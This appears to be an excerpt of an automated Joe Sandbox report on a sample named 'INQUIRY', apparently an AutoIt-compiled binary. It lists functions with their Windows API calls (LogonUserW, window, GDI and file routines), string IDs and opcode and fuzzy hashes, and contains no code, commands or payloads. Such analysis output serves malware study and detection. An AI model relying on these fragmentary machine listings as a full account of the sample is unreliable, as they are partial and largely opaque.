                                                                                              Function 00A687B1 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00A68389), ref: 00A687D1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: LogonUser
                                                                                              • String ID:
                                                                                              • API String ID: 1244722697-0
                                                                                              • Opcode ID: b4ea772b386621f83c53a9498ec8f9011e51f44f2bb53ff4b0984b8f2280eb60
                                                                                              • Instruction ID: 563008ad0b145b003a5dc6e6c5f03d22ce16a2e285dbf2cc741bd4c6d794d09e
                                                                                              • Opcode Fuzzy Hash: b4ea772b386621f83c53a9498ec8f9011e51f44f2bb53ff4b0984b8f2280eb60
                                                                                              • Instruction Fuzzy Hash: 00D05E3226450EAFEF018EA4DC01EAE3B69EB04B01F408111FE15C50A1C775D835AB60
                                                                                              Function 00A3A124 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00A3A12A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: e711638fcf1f793c1a172b3ef6dd127f3b3c62f362a649f9c5d58c168b43f650
                                                                                              • Instruction ID: 8a0fdc1ce79b12bb69bcf76334b6dc07c99b816608be1ae84789d506ecc5bbb0
                                                                                              • Opcode Fuzzy Hash: e711638fcf1f793c1a172b3ef6dd127f3b3c62f362a649f9c5d58c168b43f650
                                                                                              • Instruction Fuzzy Hash: 0EA0123000010CEB8A001B91EC044457F5CD6001907004021F40C840218B3254514580
                                                                                              Function 00A28808 Relevance: .6, Instructions: 590COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c70d1ab515f9ffdbf74011b56dd77700555ae94d04f0145eb1b211cd61d49032
                                                                                              • Instruction ID: 20fa22ffaa7f621146d1d9eeb6920dd57074c207f2cbb710fc412191d197602d
                                                                                              • Opcode Fuzzy Hash: c70d1ab515f9ffdbf74011b56dd77700555ae94d04f0145eb1b211cd61d49032
                                                                                              • Instruction Fuzzy Hash: 75222330A056268BDF288B7CE59467C77B1FB01384F2A817AF9428B592DF789DD1C641
                                                                                              Function 00A321C5 Relevance: .3, Instructions: 345COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                              • Instruction ID: dad8460d902510cb5c739df2966b42db773c6968dcdb23c4a4184637546adff8
                                                                                              • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                              • Instruction Fuzzy Hash: 66C172322051930ADF2D473A847417EFAA19EA37B1B1A076DF8B3CB1D4EE24D965D720
                                                                                              Function 00A325FA Relevance: .3, Instructions: 341COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                              • Instruction ID: 4b11d399757e6f2373f44af940e4f636b68b36653a12c6504407fc00501404db
                                                                                              • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                              • Instruction Fuzzy Hash: 08C162322051930ADF6D473AC47423EFAA19EA37B1B1A176DF4B2DB1D5EE20C925D720
                                                                                              Function 00A31978 Relevance: .3, Instructions: 323COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                              • Instruction ID: 028a0a6eba535991520892db62e2cf17a4ae82862b932ddc96ac9630a245aca9
                                                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                              • Instruction Fuzzy Hash: 0AC16F322091930ADF6D473AC47413EFAA19EA37F271A176DF4B2CB1D4EE20C965D660
                                                                                              Function 01DA3600 Relevance: .1, Instructions: 92COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694788619.0000000001DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01DA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1da0000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                              • Instruction ID: 8167ab63501efd3bea03d0c63de3dc7da21a1807d10baac6110a530c774073fe
                                                                                              • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                              • Instruction Fuzzy Hash: AC41D371D1051CEBCF48CFADC991AEEBBF2AF88201F948299D516AB345D730AB41DB40
                                                                                              Function 01DA34F0 Relevance: .0, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694788619.0000000001DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01DA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1da0000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                              • Instruction ID: 4979d43373b504232074480f09c843cdb75fe30fa9db208582a3a14743c30e5c
                                                                                              • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                              • Instruction Fuzzy Hash: 30019278A04109EFCB49DF98C5909AEF7B6FF48310F608599D859A7741D730EE41DB80
                                                                                              Function 01DA3490 Relevance: .0, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694788619.0000000001DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01DA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1da0000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                              • Instruction ID: 6036642839e3386f50652c454aadd8f8f839aff6cacbfef24e5982cc3484cd1e
                                                                                              • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                              • Instruction Fuzzy Hash: A201AF78A04209EFCB49DF98C5909AEF7F6FF48310F608599E809A7701E730AE41DB90
                                                                                              Function 01DA1E70 Relevance: .0, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694788619.0000000001DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01DA0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_1da0000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                              • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                              • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                              • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                              Function 00A87806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A8785B
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A8786D
                                                                                              • DestroyWindow.USER32 ref: 00A8787B
                                                                                              • GetDesktopWindow.USER32 ref: 00A87895
                                                                                              • GetWindowRect.USER32(00000000), ref: 00A8789C
                                                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00A879DD
                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00A879ED
                                                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87A35
                                                                                              • GetClientRect.USER32(00000000,?), ref: 00A87A41
                                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00A87A7B
                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87A9D
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87AB0
                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87ABB
                                                                                              • GlobalLock.KERNEL32(00000000), ref: 00A87AC4
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87AD3
                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00A87ADC
                                                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87AE3
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00A87AEE
                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87B00
                                                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00AA2CAC,00000000), ref: 00A87B16
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00A87B26
                                                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00A87B4C
                                                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00A87B6B
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87B8D
                                                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00A87D7A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                                              • API String ID: 2211948467-2373415609
                                                                                              • Opcode ID: 8897c169abf79b191050d95f1c0115388d0b69d50aa9adf1a3a9f49ed277210b
                                                                                              • Instruction ID: 660be0109855ee5e7ad2308fbdb2ee342c25dadc6ffdc96df62620b30e9aa464
                                                                                              • Opcode Fuzzy Hash: 8897c169abf79b191050d95f1c0115388d0b69d50aa9adf1a3a9f49ed277210b
                                                                                              • Instruction Fuzzy Hash: E8024C71A00115EFDB14DFA4DD89EAE7BB9EB48310F148159F915EB2A1CB30ED42CB60
                                                                                              Function 00A9356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CharUpperBuffW.USER32(?,?,00A9F910), ref: 00A93627
                                                                                              • IsWindowVisible.USER32(?), ref: 00A9364B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: BuffCharUpperVisibleWindow
                                                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                              • API String ID: 4105515805-45149045
                                                                                              • Opcode ID: 1318bd9d8f7265da8438448ca3287cff6c493f21203d4a36d0ec1840ec44994a
                                                                                              • Instruction ID: d9f9feed8c4ae59906071bbba91c98de2218e45b1414343ee84beb91419c3c4f
                                                                                              • Opcode Fuzzy Hash: 1318bd9d8f7265da8438448ca3287cff6c493f21203d4a36d0ec1840ec44994a
                                                                                              • Instruction Fuzzy Hash: 6DD14A326083019FCF04EF10C665EAF77F5AF95394F154468F8865B2A2DB21EE4ACB45
                                                                                              Function 00A9A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00A9A630
                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00A9A661
                                                                                              • GetSysColor.USER32(0000000F), ref: 00A9A66D
                                                                                              • SetBkColor.GDI32(?,000000FF), ref: 00A9A687
                                                                                              • SelectObject.GDI32(?,00000000), ref: 00A9A696
                                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00A9A6C1
                                                                                              • GetSysColor.USER32(00000010), ref: 00A9A6C9
                                                                                              • CreateSolidBrush.GDI32(00000000), ref: 00A9A6D0
                                                                                              • FrameRect.USER32(?,?,00000000), ref: 00A9A6DF
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A9A6E6
                                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 00A9A731
                                                                                              • FillRect.USER32(?,?,00000000), ref: 00A9A763
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00A9A78E
                                                                                                • Part of subcall function 00A9A8CA: GetSysColor.USER32(00000012), ref: 00A9A903
                                                                                                • Part of subcall function 00A9A8CA: SetTextColor.GDI32(?,?), ref: 00A9A907
                                                                                                • Part of subcall function 00A9A8CA: GetSysColorBrush.USER32(0000000F), ref: 00A9A91D
                                                                                                • Part of subcall function 00A9A8CA: GetSysColor.USER32(0000000F), ref: 00A9A928
                                                                                                • Part of subcall function 00A9A8CA: GetSysColor.USER32(00000011), ref: 00A9A945
                                                                                                • Part of subcall function 00A9A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00A9A953
                                                                                                • Part of subcall function 00A9A8CA: SelectObject.GDI32(?,00000000), ref: 00A9A964
                                                                                                • Part of subcall function 00A9A8CA: SetBkColor.GDI32(?,00000000), ref: 00A9A96D
                                                                                                • Part of subcall function 00A9A8CA: SelectObject.GDI32(?,?), ref: 00A9A97A
                                                                                                • Part of subcall function 00A9A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00A9A999
                                                                                                • Part of subcall function 00A9A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00A9A9B0
                                                                                                • Part of subcall function 00A9A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00A9A9C5
                                                                                                • Part of subcall function 00A9A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00A9A9ED
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                              • String ID:
                                                                                              • API String ID: 3521893082-0
                                                                                              • Opcode ID: 99826bb8041af1bc11efd2f32d17860978d9d56f5d5e63d4edfbb2f3728ef2db
                                                                                              • Instruction ID: ec2e4de2a5d5076705936db9faeb221d1b2879e0b89d751d6e4c219e0fd6fa93
                                                                                              • Opcode Fuzzy Hash: 99826bb8041af1bc11efd2f32d17860978d9d56f5d5e63d4edfbb2f3728ef2db
                                                                                              • Instruction Fuzzy Hash: 08914E72608301EFDB10DFA4DC48A5B7BE9FB48321F104B2AF962D61A0DB71D945CB92
                                                                                              Function 00A12C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(?,?,?), ref: 00A12CA2
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A12CE8
                                                                                              • DeleteObject.GDI32(00000000), ref: 00A12CF3
                                                                                              • DestroyIcon.USER32(00000000,?,?,?), ref: 00A12CFE
                                                                                              • DestroyWindow.USER32(00000000,?,?,?), ref: 00A12D09
                                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 00A4C43B
                                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00A4C474
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00A4C89D
                                                                                                • Part of subcall function 00A11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A12036,?,00000000,?,?,?,?,00A116CB,00000000,?), ref: 00A11B9A
                                                                                              • SendMessageW.USER32(?,00001053), ref: 00A4C8DA
                                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00A4C8F1
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00A4C907
                                                                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00A4C912
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1694224988.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1694213265.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694268621.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694303952.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1694359136.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_a10000_INQUIRY.jbxd
                                                                                              Similarity
                                                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                              • String ID: 0
                                                                                              • API String ID: 464785882-4108050209
                                                                                              • Opcode ID: 730a98dc54b6769a6f380e722503e1963bbfdbe80fc6cc6dde5fde28ac23e787
                                                                                              • Instruction ID: 8d4f30b4395a1dc70deba9086dd138ee69bcf41dd70cdc9fb411c2f160306235
                                                                                              • Opcode Fuzzy Hash: 730a98dc54b6769a6f380e722503e1963bbfdbe80fc6cc6dde5fde28ac23e787
                                                                                              • Instruction Fuzzy Hash: AC129F34601201EFDB55CF24C984BA9B7E5FF84320F584569F999CB262DB31EC92CB91
                                                                                              Function 00A874AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(00000000), ref: 00A874DE
                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00A8759D
                                                                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00A875DB
                                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00A875ED
                                                                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00A87633
                                                                                              • GetClientRect.USER32(00000000,?), ref: 00A8763F
                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00A87683
                                                                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00A87692
                                                                                              • GetStockObject.GDI32(00000011), ref: 00A876A2
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00A876A6
                                                                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00A876B6
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A876BF
                                                                                              • DeleteDC.GDI32(00000000), ref: 00A876C8
                                                                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00A876F4
                                                                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 00A8770B
                                                                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00A87746
                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00A8775A
                                                                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00A8776B
                                                                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00A8779B
                                                                                              • GetStockObject.GDI32(00000011), ref: 00A877A6
                                                                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00A877B1
                                                                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00A877BB
                                                                                              Strings
                                                                                              Memory Dump Source
